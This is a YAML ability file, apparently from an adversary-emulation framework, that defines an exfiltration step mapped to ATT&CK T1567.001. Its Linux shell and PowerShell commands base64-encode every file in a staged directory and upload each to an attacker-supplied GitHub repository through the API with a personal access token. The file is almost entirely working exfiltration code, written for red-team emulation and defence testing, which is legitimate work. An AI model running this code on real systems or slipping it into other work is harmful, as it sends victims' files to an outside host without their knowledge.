data/abilities/exfiltration/a201bec2-a193-4b58-bf0e-57fa621da474.yml

- id: a201bec2-a193-4b58-bf0e-57fa621da474
  name: Exfil Directory Files to GitHub
  description: |
    This ability will exfiltrate all files in a set staged directory to a repository in GitHub.
  tactic: exfiltration
  technique:
    attack_id: T1567.001
    name: Exfiltration to Code Repository
  platforms:
    linux:
      sh:
        command: |
          GHUser="#{github.user.name}";
          GHRepo="#{github.repository.name}";
          GHPAT="#{github.access.token}";
          GHBranch='#{github.repository.branch}';
          LocalDirectory=#{host.dir.staged};
          Header="Authorization: token $GHPAT";

          for file in $LocalDirectory/*.*; do
            TempName=$(echo $file | sed "s/ /-/g")
          	RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename "$TempName")";
          	echo "{\"message\":\"Committed $(basename $TempName) at: $(date)\", \"branch\":\"$GHBranch\", \"content\":\"" >/tmp/b64;
            base64 -w 0 "$file" >>/tmp/b64;
            echo "\"}" >>/tmp/b64;
          	content=$(curl -s -X PUT -H "Accept: application/vnd.github.v3+json" -H "$Header" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);
            rm /tmp/b64;
          done;
    windows:
      psh,pwsh:
        command: |
          $GHUser = "#{github.user.name}";
          $GHRepo = "#{github.repository.name}";
          $GHPAT = "#{github.access.token}";
          $GHBranch = '#{github.repository.branch}';
          $LocalDirectory = "#{host.dir.staged}";
          $token = $GHUser + ":" + $GHPAT;
          $basetoken = [System.Convert]::ToBase64String([char[]]$token);
          $Headers = @{
              Authorization = 'Basic {0}' -f $basetoken;
          };

          $Files = Get-ChildItem $LocalDirectory;
          foreach ($file in $Files){
              $RemoteName = "$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($file.name)";
              $uri = "https://api.github.com/repos/" + $GHUser + "/" + $GHRepo + "/contents/" + $RemoteName;
              $FileBytes = Get-Content -Path $file.FullName -Encoding Byte;
              $Base64EncodedFileBytes = [System.Convert]::ToBase64String($FileBytes);
              $Body = @{
                  path = $file.Name;
                  branch = $GHBranch;
                  content = $Base64EncodedFileBytes;
                  encoding = 'base64';
                  message = "Committed " + $file.name + " at: " + (Get-Date);
              } | ConvertTo-Json;
              try {
                  $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue;
              } catch {
                  if ($PSItem -notmatch "but expected") { $PSItem; }
                  else { $content = Invoke-RestMethod -Headers $Headers -Uri $uri -Body $Body -Method Put -ErrorAction SilentlyContinue; }
              }
          };
  requirements:
    - plugins.stockpile.app.requirements.paw_provenance:
        - source: host.dir.staged